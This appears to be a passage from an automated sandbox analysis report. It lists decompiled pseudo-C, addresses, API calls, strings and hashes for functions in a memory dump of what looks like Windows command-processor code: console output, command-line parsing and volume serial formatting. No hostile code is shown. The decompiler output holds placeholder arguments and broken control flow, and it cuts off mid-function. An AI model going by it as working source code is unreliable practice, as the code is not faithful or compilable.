									_t88 = _a4;
									_t84 = _t68;
									L19:
									while(_t68 < _v12) {
										if( *_t68 == 0x2022) {
											_t68 = _t68 + 2;
											continue;
										}
										break;
									}
									if(_t68 == _t84) {
										L24:
										_t37 = _v12;
										continue;
									} else {
										E4A74EA77(_t88);
										_t57 =  &_v8;
										_t92 = _t68 - _t84 >> 1;
										__imp___get_osfhandle(_t84, _t92, _t57, 0);
										_t72 = 1;
										_t58 = WriteConsoleW(_t57, ??, ??, ??, ??);
										_t84 = _t58;
										_t59 = E4A731605();
										if(_t58 == 0 || _v8 != _t92) {
											goto L27;
										} else {
											_t88 = _a4;
											_t84 = _t68;
											goto L24;
										}
									}
								}
							}
						}
						L36:
					}
				} else {
					if(E4A73453E( *(_t88 + 8) +  *(_t88 + 8), 1,  *(_t88 + 0x10),  *(_t88 + 8) +  *(_t88 + 8),  &_v8) == 0) {
						L28:
						if(E4A733B03(_t59, _t72, 1) == 0) {
							_t61 = E4A736BEA(_t60, 1);
							if(_t61 == 0) {
								_push(_t61);
								_push(0x70);
								goto L32;
							}
						} else {
							_push(0);
							_push(0x1d);
							L32:
							E4A736D44(_t72);
							_pop(_t72);
						}
						_t37 = E4A74FCA6(_t68, _t72, _t78, _t84, _t88);
					} else {
						_t67 =  *(_t88 + 8);
						_t59 =  *(_t88 + 8) + _t67;
						if(_v8 !=  *(_t88 + 8) + _t67) {
							goto L28;
						}
					}
				}
				L3:
				_t38 = E4A734490(_t37, 1);
				_t39 = 0x4a7545a8;
				_t7 = _t39 + 2; // 0x4a7545aa
				_t85 = _t7;
				if(_t38 != 0) {
					do {
						_t79 =  *_t39;
						_t39 = _t39 + 2;
					} while (_t79 != 0);
					__imp___get_osfhandle(0);
					WriteConsoleW(_t39 - _t85 >> 1, 1, 0x4a7545a8, _t39 - _t85 >> 1,  &_v8);
				} else {
					do {
						_t81 =  *_t39;
						_t39 = _t39 + 2;
					} while (_t81 != 0);
					E4A73453E((_t39 - _t85 >> 1) + (_t39 - _t85 >> 1), 1, 0x4a7545a8, (_t39 - _t85 >> 1) + (_t39 - _t85 >> 1),  &_v8);
				}
				 *(_t88 + 4) =  *(_t88 + 4) + E4A73A8A9(_t88,  *(_t88 + 0x10)) + 1;
				E4A73AA4F(_t88);
				if( *(_t88 + 4) >  *((intOrPtr*)(_t88 + 0x1c))) {
					 *(_t88 + 4) =  *(_t88 + 4) & 0x00000000;
				}
				 *( *(_t88 + 0x10)) = 0;
				 *(_t88 + 8) =  *(_t88 + 8) & 0;
				return 0;
				goto L36;
			}

0x4a73a995
0x4a73a99a
0x4a73a99b
0x4a73a99c
0x4a73a99e
0x4a73a9b1
0x4a747af1
0x4a747af7
0x4a747afa
0x4a747b9f
0x4a747b02
0x4a747b06
0x00000000
0x4a747b0c
0x4a747b0c
0x4a747b17
0x4a747b1a
0x00000000
0x00000000
0x00000000
0x4a747b1a
0x4a747b1e
0x00000000
0x4a747b20
0x4a747b24
0x4a747b2a
0x4a747b30
0x4a747b36
0x4a747b40
0x4a747bac
0x4a747bac
0x00000000
0x4a747b47
0x4a747b47
0x4a747b4a
0x00000000
0x4a747b5a
0x4a747b56
0x4a747b59
0x00000000
0x4a747b59
0x00000000
0x4a747b56
0x4a747b61
0x4a747b9c
0x4a747b9c
0x00000000
0x4a747b63
0x4a747b64
0x4a747b6d
0x4a747b73
0x4a747b79
0x4a747b7f
0x4a747b81
0x4a747b87
0x4a747b89
0x4a747b90
0x00000000
0x4a747b97
0x4a747b97
0x4a747b9a
0x00000000
0x4a747b9a
0x4a747b90
0x4a747b61
0x4a747b40
0x4a747b1e
0x00000000
0x4a747b06
0x4a73a9b7
0x4a73a9cd
0x4a747baf
0x4a747bb8
0x4a747bc2
0x4a747bc9
0x4a747bcb
0x4a747bcc
0x00000000
0x4a747bcc
0x4a747bba
0x4a747bba
0x4a747bbc
0x4a747bce
0x4a747bce
0x4a747bd4
0x4a747bd4
0x4a747bd5
0x4a73a9d3
0x4a73a9d3
0x4a73a9d6
0x4a73a9db
0x00000000
0x00000000
0x4a73a9db
0x4a73a9cd
0x4a73a9e1
0x4a73a9e3
0x4a73a9ef
0x4a73a9f1
0x4a73a9f1
0x4a73a9f4
0x4a747bdf
0x4a747bdf
0x4a747be3
0x4a747be4
0x4a747bf7
0x4a747bff
0x4a73a9fa
0x4a73a9fa
0x4a73a9fa
0x4a73a9fe
0x4a73a9ff
0x4a73aa12
0x4a73aa12
0x4a73aa21
0x4a73aa25
0x4a73aa30
0x4a73fd88
0x4a73fd88
0x4a73aa3b
0x4a73aa3e
0x4a73aa47
0x00000000

APIs

Part of subcall function 4A734490: _get_osfhandle.MSVCRT ref: 4A73449A
Part of subcall function 4A734490: GetFileType.KERNEL32(00000000), ref: 4A7344A9

_get_osfhandle.MSVCRT ref: 4A747B30
WriteConsoleW.KERNEL32 ref: 4A747B38
_get_osfhandle.MSVCRT ref: 4A747B79
WriteConsoleW.KERNEL32 ref: 4A747B81

Part of subcall function 4A73453E: _get_osfhandle.MSVCRT ref: 4A734550
Part of subcall function 4A73453E: WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A73459B
Part of subcall function 4A73453E: WriteFile.KERNEL32(?,4A756640,-00000001,4A744FE5,00000000), ref: 4A7345AE

_get_osfhandle.MSVCRT ref: 4A747BF7
WriteConsoleW.KERNEL32 ref: 4A747BFF

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _get_osfhandle$Write$Console$File$ByteCharMultiTypeWide
String ID:
API String ID: 2401993446-0
Opcode ID: 330dd82984dd2084a7465405fa2e81f52203d77602841f973e03b3eafe4fea4b
Instruction ID: 87abe8d27300d02bd73f3b0cac0e1351f487fbbc1cd3651b2c263e0b736f82b7
Opcode Fuzzy Hash: 330dd82984dd2084a7465405fa2e81f52203d77602841f973e03b3eafe4fea4b
Instruction Fuzzy Hash: 9F5102B2648701BFE7719BA4CD4AFEA3BA9EF40751F120515E906DB082E771EE48C760

Uniqueness

Uniqueness Score: -1.00%

Function 4A74E7A2, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B

_wcsicmp.MSVCRT ref: 4A74E810
_wcsicmp.MSVCRT ref: 4A74E82B
_wcsicmp.MSVCRT ref: 4A74E84C

Strings

KEYS, xrefs: 4A74E83A
OFF, xrefs: 4A74E824, 4A74E829, 4A74E839
LIST, xrefs: 4A74E846

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$iswspace
String ID: KEYS$LIST$OFF
API String ID: 759518647-4129271751
Opcode ID: cae4bc12a6e2383aa27edec816475845da164127386cb816da1c763b8b0b0531
Instruction ID: 35d7ae03d1c7b39e86dc216671c8ad83d652d30e91add91439af69277f14b926
Opcode Fuzzy Hash: cae4bc12a6e2383aa27edec816475845da164127386cb816da1c763b8b0b0531
Instruction Fuzzy Hash: 3911B17361C322BDF6361762DD8ADE36FACEB417B0B52403AE100CE481EA505C0CC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 4A7341DD, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E4A7341DD(intOrPtr _a4, long _a8) {
				signed int _v8;
				short _v528;
				signed int _v529;
				char _v530;
				char _v531;
				signed int _v536;
				long _v540;
				signed int __ebx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				long _t80;
				signed int _t81;
				signed int _t82;
				signed int _t85;
				long _t86;
				long _t88;
				long _t90;
				signed int _t98;
				long _t99;
				long _t100;
				long _t102;
				void* _t103;
				long _t109;
				void* _t111;
				signed int _t112;
				long _t113;
				intOrPtr _t114;
				signed int _t115;

				_t73 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t73 ^ _t115;
				_v536 = _v536 | 0xffffffff;
				_t114 = _a4;
				_v540 = _a8;
				_v529 = 0;
				_t102 = 0;
				while(1) {
					__ecx =  *((intOrPtr*)(__esi + 0x38));
					__edi =  *(__ecx + __ebx * 2) & 0x0000ffff;
					__eflags = __di - 0x22;
					if(__di == 0x22) {
						__eflags = _v529;
						__eax = __eax & 0xffffff00 | _v529 == 0x00000000;
						__eflags = __al;
						_v529 = __al;
						__eax = __eax & 0xffffff00 | __al == 0x00000000;
					}
					__eflags = __di;
					if(__di == 0) {
						break;
					}
					__eflags = _v529;
					if(_v529 != 0) {
						L8:
						__eflags = _v536 - 0xffffffff;
						if(_v536 != 0xffffffff) {
							L10:
							__al = 0;
							 *((short*)(__ebp + __ebx * 2 - 0x20c)) = __di;
							__ebx = __ebx + 1;
							__eflags = __ebx - 0x103;
							if(__ebx < 0x103) {
								continue;
							}
							break;
						}
						__eax = E4A7318EB(":.\", __edi);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *0x4a754081;
							if( *0x4a754081 == 0) {
								break;
							}
							_v536 = __ebx;
						}
						goto L10;
					}
					__eflags = __al;
					if(__al != 0) {
						goto L8;
					}
					__eax = E4A7318EB(L"=,;+/[] \t\"", __edi);
					__eflags = __eax;
					if(__eax != 0) {
						break;
					}
					goto L8;
				}
				__eflags = __ebx;
				if(__ebx == 0) {
					_t60 = __ebx - 1; // -1
					__eax = _t60;
					L20:
					return E4A7313A9(_t80, _t102, _v8 ^ _t115, _t111, _t113, _t114);
				}
				__eax = 0;
				__eflags = _v536 - 0xffffffff;
				 *((short*)(__ebp + __ebx * 2 - 0x20c)) = __ax;
				if(_v536 != 0xffffffff) {
					__eax =  &_v528;
					__eax = GetFileAttributesW( &_v528);
					__eflags = __eax - 0xffffffff;
					if(__eax != 0xffffffff) {
						if(0 == 0) {
							goto L13;
						}
					}
					_t102 = _v536;
					 *((short*)(_t115 + _t102 * 2 - 0x20c)) = 0;
				}
				L13:
				_t112 = E4A7340F2(0x2a,  &_v528, _v540);
				_v536 = _t112;
				if(_t112 == 0xffffffff) {
					_t80 = E4A7340F2(0x2d,  &_v528, _v540);
					__eflags = _t80 - 0x2d;
					if(_t80 != 0x2d) {
						L15:
						_v529 = 0;
						_v530 = 0;
						if(_t112 == 0xffffffff) {
							_t102 = 0;
							__eflags = 0;
							_v531 = 0;
							do {
								_t81 =  *(_t114 + 0x38);
								_t113 =  *(_t81 + _t102 * 2) & 0x0000ffff;
								__eflags = _t113;
								if(_t113 == 0) {
									L34:
									_v531 = 1;
									goto L32;
								}
								__eflags = _t113 - 0x22;
								if(_t113 == 0x22) {
									__eflags = _v529;
									_t98 = _t81 & 0xffffff00 | _v529 == 0x00000000;
									__eflags = _t98;
									_v529 = _t98;
									_v530 = _t98 == 0;
								}
								__eflags = _v529;
								if(_v529 != 0) {
									L31:
									_t102 = _t102 + 1;
									__eflags = _t102;
									_v530 = 0;
								} else {
									__eflags = _v530;
									if(_v530 != 0) {
										goto L31;
									}
									_t99 = iswspace(_t113);
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									_t100 = E4A7318EB("=,;", _t113);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L34;
									}
									__eflags = _t113 -  *0x4a77065c; // 0x2f
									if(__eflags == 0) {
										goto L34;
									}
									goto L31;
								}
								L32:
								__eflags = _v531;
							} while (_v531 == 0);
						}
						_t82 =  *(_t114 + 0x38);
						_t111 = _t82 + 2;
						do {
							_t103 =  *_t82;
							_t82 = _t82 + 2;
						} while (_t103 != 0);
						_t85 = _t82 - _t111 >> 1;
						if(_t102 != _t85) {
							_t113 = _t85 + 1;
							_t86 =  *(_t114 + 0x3c);
							__eflags = _t86;
							if(_t86 == 0) {
								L47:
								_t88 = E4A732041(_t113 + _t113);
								_t102 = _t102 + _t102;
								_v540 = _t88;
								E4A73185A(_t88, _t113,  *(_t114 + 0x38) + _t102);
								_t90 =  *(_t114 + 0x3c);
								__eflags = _t90;
								if(_t90 != 0) {
									E4A7320A9(_t114, _v540, _t113, _t90);
								}
								 *(_t114 + 0x3c) = _v540;
								 *((short*)(_t102 +  *(_t114 + 0x38))) = 0;
								goto L19;
							}
							_t63 = _t86 + 2; // 0x4a754212
							_t111 = _t63;
							do {
								_t109 =  *_t86;
								_t86 = _t86 + 2;
								__eflags = _t109;
							} while (_t109 != 0);
							__eflags = _t113;
							goto L47;
						}
						L19:
						_t80 = _v536;
						goto L20;
					}
					goto L20;
				}
				if(_t112 == 0x14) {
					 *((intOrPtr*)(_t114 + 0x40)) = 1;
				}
				goto L15;
			}

0x4a7341e8
0x4a7341ef
0x4a7341f5
0x4a7341fe
0x4a734201
0x4a73420a
0x4a734211
0x4a734213
0x4a734213
0x4a734216
0x4a73421a
0x4a73421e
0x4a73c123
0x4a73c12a
0x4a73c12d
0x4a73c12f
0x4a73c135
0x4a73c135
0x4a734224
0x4a734227
0x00000000
0x00000000
0x4a734229
0x4a734230
0x4a734245
0x4a734245
0x4a73424c
0x4a734261
0x4a734261
0x4a734263
0x4a73426b
0x4a73426c
0x4a734272
0x00000000
0x00000000
0x00000000
0x4a734272
0x4a734254
0x4a734259
0x4a73425b
0x4a735572
0x4a735579
0x00000000
0x00000000
0x4a73557f
0x4a73557f
0x00000000
0x4a73425b
0x4a734232
0x4a734234
0x00000000
0x00000000
0x4a73423c
0x4a734241
0x4a734243
0x00000000
0x00000000
0x00000000
0x4a734243
0x4a734274
0x4a734276
0x4a74713d
0x4a74713d
0x4a7342fa
0x4a734308
0x4a734308
0x4a73427c
0x4a73427e
0x4a734285
0x4a73428d
0x4a735547
0x4a73554e
0x4a735554
0x4a735557
0x4a732cbc
0x00000000
0x00000000
0x4a732cc2
0x4a73555d
0x4a735565
0x4a735565
0x4a734293
0x4a7342a7
0x4a7342a9
0x4a7342b2
0x4a7354c1
0x4a7354c6
0x4a7354c9
0x4a7342c1
0x4a7342c1
0x4a7342c8
0x4a7342d2
0x4a7354d4
0x4a7354d4
0x4a7354d6
0x4a7354dc
0x4a7354dc
0x4a7354df
0x4a7354e3
0x4a7354e6
0x4a73553e
0x4a73553e
0x00000000
0x4a73553e
0x4a7354e8
0x4a7354ec
0x4a73c13d
0x4a73c144
0x4a73c147
0x4a73c149
0x4a73c14f
0x4a73c14f
0x4a7354f2
0x4a7354f9
0x4a735528
0x4a735528
0x4a735528
0x4a735529
0x4a7354fb
0x4a7354fb
0x4a735502
0x00000000
0x00000000
0x4a735505
0x4a73550c
0x4a73550e
0x00000000
0x00000000
0x4a735516
0x4a73551b
0x4a73551d
0x00000000
0x00000000
0x4a73551f
0x4a735526
0x00000000
0x00000000
0x00000000
0x4a735526
0x4a735530
0x4a735530
0x4a735530
0x4a735539
0x4a7342d8
0x4a7342db
0x4a7342de
0x4a7342de
0x4a7342e2
0x4a7342e3
0x4a7342ea
0x4a7342ee
0x4a747145
0x4a747148
0x4a74714b
0x4a74714d
0x4a747162
0x4a747166
0x4a74716e
0x4a747175
0x4a74717b
0x4a747180
0x4a747183
0x4a747185
0x4a74718f
0x4a74718f
0x4a74719a
0x4a7471a2
0x00000000
0x4a7471a2
0x4a74714f
0x4a74714f
0x4a747152
0x4a747152
0x4a747156
0x4a747157
0x4a747157
0x4a747160
0x00000000
0x4a747160
0x4a7342f4
0x4a7342f4
0x00000000
0x4a7342f4
0x00000000
0x4a7354cf
0x4a7342bb
0x4a73660b
0x4a73660b
0x00000000

Strings

:.\, xrefs: 4A73424F
=,;+/[] ", xrefs: 4A734237
=,;, xrefs: 4A735511

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: wcschr
String ID: :.\$=,;$=,;+/[] "
API String ID: 1497570035-843887632
Opcode ID: 18060591d4e3c8b59472209886fd8296d3949a6787d37b458ff77eee75158177
Instruction ID: c0591a322a14a2d0e43b337e1378a4c0681c4ed59a65cb2092ab16310100d76b
Opcode Fuzzy Hash: 18060591d4e3c8b59472209886fd8296d3949a6787d37b458ff77eee75158177
Instruction Fuzzy Hash: 5371397094EB599EDFB08BA4C8887D97FB5AF45310F0382E9C459A7593D7309A8CCB11

Uniqueness

Uniqueness Score: -1.00%

Function 4A731F90, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A731F90(signed short* _a4, signed char* _a8) {
				signed short _t25;
				signed int _t28;
				signed char _t29;
				signed int _t30;
				signed int _t32;
				void* _t34;
				signed int _t35;
				signed short* _t38;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				signed short _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed char _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				signed short _t55;
				signed int _t63;
				signed short* _t64;
				signed char* _t66;
				intOrPtr _t67;

				_t25 = E4A731E26();
				_t64 = _a4;
				_t66 = _a8;
				 *_t64 = _t25;
				_t67 =  *0x4a770650; // 0x0
				if(_t67 != 0) {
					__eflags =  *_t66 & 0x00000040;
					 *0x4a770650 = 0;
					if(( *_t66 & 0x00000040) != 0) {
						L10:
						return 0;
					}
					 *_t64 = E4A731E26();
				}
				_t55 =  *_t64 & 0x0000ffff;
				_t28 = _t55 & 0x0000ffff;
				_t63 = 2;
				if(_t28 <= 0x29) {
					if(__eflags == 0) {
						L22:
						_t29 =  *_t66;
						__eflags = _t29 & 0x00000022;
						if((_t29 & 0x00000022) != 0) {
							L6:
							_t30 =  *_t64 & 0x0000ffff;
							if(_t30 == 0x5e) {
								__eflags =  *_t66 & 0x00000022;
								if(( *_t66 & 0x00000022) != 0) {
									goto L7;
								}
								_t42 = E4A731E26();
								 *_t64 = _t42;
								__eflags = _t42 - 0xa;
								if(_t42 != 0xa) {
									goto L10;
								}
								_t43 = E4A731E26();
								 *_t64 = _t43;
								__eflags = _t43;
								L38:
								if(__eflags == 0) {
									L17:
									return 0x100;
								}
								goto L10;
							}
							L7:
							if(_t30 == 0x22) {
								 *_t66 =  *_t66 ^ _t63;
							}
							if(( *_t66 & 0x00000023) == 0) {
								_t32 = iswspace( *_t64 & 0x0000ffff);
								__eflags = _t32;
								if(_t32 != 0) {
									goto L17;
								}
								__eflags =  *_t66 & 0x00000004;
								_t34 = 0x4a754672;
								if(( *_t66 & 0x00000004) == 0) {
									_t34 = 0x4a754670;
								}
								_t35 = E4A7318EB(_t34,  *_t64 & 0x0000ffff);
								__eflags = _t35;
								if(_t35 == 0) {
									goto L9;
								}
								goto L17;
							} else {
								L9:
								if(iswdigit( *_t64 & 0x0000ffff) != 0) {
									_t38 =  *0x4a754194; // 0x0
									__eflags = (_t38 - 0x4a76c642 & 0xfffffffe) - 4;
									if((_t38 - 0x4a76c642 & 0xfffffffe) < 4) {
										L35:
										_t39 =  *_t38 & 0x0000ffff;
										__eflags = _t39 - 0x3c;
										if(_t39 == 0x3c) {
											L37:
											__eflags =  *_t66 & 0x00000022;
											goto L38;
										}
										__eflags = _t39 - 0x3e;
										if(_t39 != 0x3e) {
											goto L10;
										}
										goto L37;
									}
									_t65 =  *(_t38 - 4) & 0x0000ffff;
									_t40 = iswspace( *(_t38 - 4) & 0x0000ffff);
									__eflags = _t40;
									if(_t40 != 0) {
										L34:
										_t38 =  *0x4a754194; // 0x0
										goto L35;
									}
									_t41 = E4A7318EB(L"()|&=,;\"", _t65);
									__eflags = _t41;
									if(_t41 == 0) {
										goto L10;
									}
									goto L34;
								}
								goto L10;
							}
						}
						__eflags = _t29 & 0x00000010;
						if((_t29 & 0x00000010) != 0) {
							L15:
							 *_t66 =  *_t66 & 0xffffffdd;
							__eflags =  *_t66;
							L16:
							__eflags =  *_t66 & 0x00000022;
							if(( *_t66 & 0x00000022) != 0) {
								goto L6;
							}
							goto L17;
						}
						__eflags = _t55 - 0x29;
						if(_t55 != 0x29) {
							goto L15;
						}
						goto L6;
					}
					_t44 = _t28;
					__eflags = _t44;
					if(_t44 == 0) {
						goto L15;
					}
					_t45 = _t44 - 0xa;
					__eflags = _t45;
					if(_t45 != 0) {
						_t46 = _t45 - 0x1c;
						__eflags = _t46;
						if(_t46 == 0) {
							goto L16;
						}
						__eflags = _t46 != _t63;
						if(_t46 != _t63) {
							goto L6;
						}
						L20:
						_t48 =  *_t66;
						__eflags = _t48 & 0x00000022;
						if((_t48 & 0x00000022) != 0) {
							goto L6;
						}
						__eflags = _t48 & 0x00000008;
						if((_t48 & 0x00000008) == 0) {
							goto L6;
						}
						goto L22;
					}
					goto L15;
				}
				_t49 = _t28 - 0x3c;
				if(_t49 == 0) {
					goto L16;
				}
				_t50 = _t49 - _t63;
				if(_t50 == 0) {
					goto L16;
				}
				_t51 = _t50 - _t63;
				if(_t51 == 0) {
					__eflags =  *_t66 & 0x00000022;
					if(( *_t66 & 0x00000022) != 0) {
						goto L6;
					}
					__eflags =  *0x4a754198; // 0x0
					if(__eflags != 0) {
						goto L20;
					}
					goto L10;
				}
				if(_t51 == 0x3c) {
					goto L16;
				}
				goto L6;
			}

0x4a731f98
0x4a731f9d
0x4a731fa0
0x4a731fa5
0x4a731fa8
0x4a731fae
0x4a746f9b
0x4a746f9e
0x4a746fa4
0x4a732011
0x00000000
0x4a732011
0x4a746faf
0x4a746faf
0x4a731fb4
0x4a731fb7
0x4a731fbf
0x4a731fc0
0x4a73201a
0x4a7325df
0x4a7325df
0x4a7325e1
0x4a7325e3
0x4a731fd8
0x4a731fd8
0x4a731fdf
0x4a73fdf9
0x4a73fdfc
0x00000000
0x00000000
0x4a73fe02
0x4a73fe07
0x4a73fe0a
0x4a73fe0e
0x00000000
0x00000000
0x4a746fb7
0x4a746fbc
0x4a746fbf
0x4a732c09
0x4a732c09
0x4a732035
0x00000000
0x4a732035
0x00000000
0x4a732c0f
0x4a731fe5
0x4a731fe9
0x4a733b6b
0x4a733b6b
0x4a731ff8
0x4a732734
0x4a732737
0x4a732739
0x00000000
0x00000000
0x4a73273f
0x4a732742
0x4a732747
0x4a732749
0x4a732749
0x4a732753
0x4a732758
0x4a73275a
0x00000000
0x00000000
0x00000000
0x4a731ffe
0x4a731ffe
0x4a73200b
0x4a732bba
0x4a732bca
0x4a732bcd
0x4a732bf3
0x4a732bf3
0x4a732bf6
0x4a732bfa
0x4a732c06
0x4a732c06
0x00000000
0x4a732c06
0x4a732bfc
0x4a732c00
0x00000000
0x00000000
0x00000000
0x4a732c00
0x4a732bcf
0x4a732bd4
0x4a732bd7
0x4a732bd9
0x4a732bee
0x4a732bee
0x00000000
0x4a732bee
0x4a732be1
0x4a732be6
0x4a732be8
0x00000000
0x00000000
0x00000000
0x4a732be8
0x00000000
0x4a73200b
0x4a731ff8
0x4a7325e9
0x4a7325eb
0x4a73202d
0x4a73202d
0x4a73202d
0x4a732030
0x4a732030
0x4a732033
0x00000000
0x00000000
0x00000000
0x4a732033
0x4a7325f1
0x4a7325f5
0x00000000
0x00000000
0x00000000
0x4a7325fb
0x4a732020
0x4a732020
0x4a732022
0x00000000
0x00000000
0x4a732024
0x4a732024
0x4a732027
0x4a7325bc
0x4a7325bc
0x4a7325bf
0x00000000
0x00000000
0x4a7325c5
0x4a7325c7
0x00000000
0x00000000
0x4a7325cd
0x4a7325cd
0x4a7325cf
0x4a7325d1
0x00000000
0x00000000
0x4a7325d7
0x4a7325d9
0x00000000
0x00000000
0x00000000
0x4a7325d9
0x00000000
0x4a732027
0x4a731fc2
0x4a731fc5
0x00000000
0x00000000
0x4a731fc7
0x4a731fc9
0x00000000
0x00000000
0x4a731fcb
0x4a731fcd
0x4a73558a
0x4a73558d
0x00000000
0x00000000
0x4a735593
0x4a735599
0x00000000
0x00000000
0x00000000
0x4a73559f
0x4a731fd6
0x00000000
0x00000000
0x00000000

APIs

iswdigit.MSVCRT ref: 4A732002
iswspace.MSVCRT ref: 4A732734
iswspace.MSVCRT ref: 4A732BD4

Strings

()|&=,;", xrefs: 4A732BDC
=,;, xrefs: 4A732749, 4A732752

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: iswspace$iswdigit
String ID: ()|&=,;"$=,;
API String ID: 2398571481-3440842346
Opcode ID: b16cabe113b8a61527acc7f35b3e3f0749030ef4a497d79eed648f6e5f17c51c
Instruction ID: e0cfa16ad752f824eb21f0e8012f6598c297061a2e4c5bf3fa69ca4b90a84df9
Opcode Fuzzy Hash: b16cabe113b8a61527acc7f35b3e3f0749030ef4a497d79eed648f6e5f17c51c
Instruction Fuzzy Hash: B141146551FA4395EBB01E69C9547787F94AF252A4F23011AEFC08E493F324858EC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 4A742ECA, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E4A742ECA(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v530;
				short _v532;
				char _v1052;
				short _v1576;
				char _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				long _v2100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr* _t35;
				void* _t42;
				intOrPtr _t66;
				unsigned int _t73;
				void* _t75;
				signed int _t78;

				_t29 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t29 ^ _t78;
				_v2092 = _a4;
				E4A73185A( &_v1052, 0x104, _a8);
				_t35 =  &_v1052;
				_t75 = _t35 + 2;
				do {
					_t66 =  *_t35;
					_t35 = _t35 + 2;
				} while (_t66 != 0);
				_t77 = 0x106;
				if(E4A73A2C1(_t75,  &_v1052, (_t35 - _t75 >> 1) + 1,  &_v532, 0x106) == 0) {
					L14:
					_t42 = 0;
				} else {
					E4A7320A9(0x106,  &_v532, 0x106, E4A732EC8);
					if(GetVolumeInformationW( &_v532,  &_v1576, 0x104,  &_v2100, 0, 0, 0, 0) == 0) {
						_t77 = GetLastError;
						if(GetLastError() == 0x90) {
							goto L14;
						} else {
							_push(0);
							_push(GetLastError());
							E4A736D44( &_v532);
							_t42 = 1;
						}
					} else {
						if(_v532 == 0x5c) {
							 *((short*)(E4A732ED1( &_v532))) = 0;
						} else {
							_v530 = 0;
						}
						if(_v1576 != 0) {
							_push( &_v1576);
							_t42 = E4A74301F(_t75, _v2092, 0x235f, 2,  &_v532);
						} else {
							_t42 = E4A74301F(_t75, _v2092, 0x235e, 1,  &_v532);
						}
						if(_t42 == 0) {
							_t73 = _v2100;
							if(_t73 == 0) {
								if(_v2096 != 0) {
									goto L10;
								} else {
								}
							} else {
								L10:
								_push(_t73 & 0x0000ffff);
								E4A73179D( &_v2088, 0x100, L"%04X-%04X", _t73 >> 0x10);
								_t42 = E4A74301F(_t75, _v2092, 0x235b, 1,  &_v2088);
							}
						}
					}
				}
				return E4A7313A9(_t42, 0, _v8 ^ _t78, _t75, 0x104, _t77);
			}

0x4a742ed5
0x4a742edc
0x4a742ee5
0x4a742efc
0x4a742f01
0x4a742f07
0x4a742f0c
0x4a742f0c
0x4a742f10
0x4a742f11
0x4a742f1a
0x4a742f37
0x4a74aaa8
0x4a74aaa8
0x4a742f3d
0x4a742f4a
0x4a742f71
0x4a74aaaf
0x4a74aabc
0x00000000
0x4a74aabe
0x4a74aabe
0x4a74aac1
0x4a74aac2
0x4a74aacb
0x4a74aacb
0x4a742f77
0x4a742f7f
0x4a74aadf
0x4a742f85
0x4a742f87
0x4a742f87
0x4a742f95
0x4a74aaed
0x4a74ab02
0x4a742f9b
0x4a742faf
0x4a742fb4
0x4a742fb9
0x4a742fbb
0x4a742fc3
0x4a743016
0x00000000
0x00000000
0x4a743018
0x4a742fc5
0x4a742fc5
0x4a742fc8
0x4a742fde
0x4a742ff7
0x4a742ffc
0x4a742fc3
0x4a742fb9
0x4a742f71
0x4a74300d

APIs

GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000,?,00000106,Function_00002EC8,?,?,?,00000106,?), ref: 4A742F69

Strings

%04X-%04X, xrefs: 4A742FCD
\, xrefs: 4A742F77

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: InformationVolume
String ID: %04X-%04X$\
API String ID: 2039140958-3612930356
Opcode ID: b68fd1a5176a9f42ffcaa7e73060993601a485b41ed83a892828315a693b945d
Instruction ID: 8c86e768d5dc6ad5b51f9f6dee3295fb1b95d6f61b6d3012290857e96e09887a
Opcode Fuzzy Hash: b68fd1a5176a9f42ffcaa7e73060993601a485b41ed83a892828315a693b945d
Instruction Fuzzy Hash: 8C4187B290411DAADF70DA64CC85EEB77BDEB58300F4145A5E649EB041EA719BC8CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 4A74C9D2, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E4A74C9D2(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr* _t18;
				short* _t19;
				intOrPtr* _t20;
				intOrPtr* _t24;
				signed int _t26;
				signed int _t27;
				signed int _t30;
				intOrPtr* _t31;
				signed int _t33;
				signed int _t40;
